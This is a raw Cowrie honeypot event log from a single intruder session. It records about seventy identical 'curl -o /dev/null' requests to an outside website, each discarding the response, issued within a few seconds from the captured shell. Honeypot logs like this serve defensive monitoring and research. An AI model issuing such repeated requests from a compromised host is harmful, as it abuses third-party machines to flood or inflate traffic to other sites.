{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.793222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.829798Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.831852Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.868716Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.869744Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.906793Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.907705Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.944556Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.945927Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:36.984189Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:36.985311Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.035879Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.036845Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.074910Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.075902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.112592Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.113548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.150563Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.151644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.191633Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.192722Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.240742Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.241786Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.279106Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.280046Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.317958Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.319073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.356418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.357440Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.395090Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.396301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.446273Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.447211Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.485395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.486387Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.523114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.524384Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.560979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.561974Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.604514Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.605490Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.643793Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.644811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.685220Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.686410Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.723649Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.724728Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.762360Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.763432Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.804807Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.805765Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.865245Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.866626Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.904294Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.905400Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.944277Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.945319Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:37.985574Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:37.986801Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.025876Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.026898Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.070293Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.071395Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.116869Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.117848Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.160275Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.161414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.208515Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.209485Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.252301Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.253333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.302339Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.303506Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.340840Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.341965Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.379981Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.381241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.423823Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.425040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.462615Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.463701Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.501077Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.502073Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.540576Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.541593Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.579295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.580646Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.622164Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.623255Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.662070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.663064Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.709760Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.711080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.752278Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.753401Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.790441Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.791590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.829808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.831069Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.870250Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.871447Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.908274Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.909425Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.946231Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.947635Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:38.984590Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:38.985613Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.022643Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.023968Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.069126Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.070201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.121887Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.122957Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.163008Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.164098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.209566Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.210652Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.249568Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.250577Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.297810Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.298897Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.341359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.342490Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.384200Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.385350Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.423114Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.424414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.464930Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.466086Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.506749Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
